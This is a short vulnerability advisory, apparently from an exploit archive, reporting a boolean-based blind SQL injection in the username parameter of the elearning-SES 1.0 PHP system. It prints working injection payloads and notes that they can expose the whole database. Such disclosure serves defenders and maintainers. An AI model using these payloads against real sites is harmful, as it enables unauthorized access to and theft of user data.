Headline
elearning-SES 1.0 Sql Injection
elearning-SES version 1.0 suffers from a remote SQL injection vulnerability.
## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 06.14.2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-elearning-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The username parameter appears to be vulnerable to SQL injectionattacks. The payloads 73152795' or 7515=7515-- and 13684562' or3996=3998-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isbeing incorporated into a SQL query in an unsafe way. The attacker caneasily steal all information from the database of this system.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)## Proof and Exploit:[href]()## Time spend:01:15:00